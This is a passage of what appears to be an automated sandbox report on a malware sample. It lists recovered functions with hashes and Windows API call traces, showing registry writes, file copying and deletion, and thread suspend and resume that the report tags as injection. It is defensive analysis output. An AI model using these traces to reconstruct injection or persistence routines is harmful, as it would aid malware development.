    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
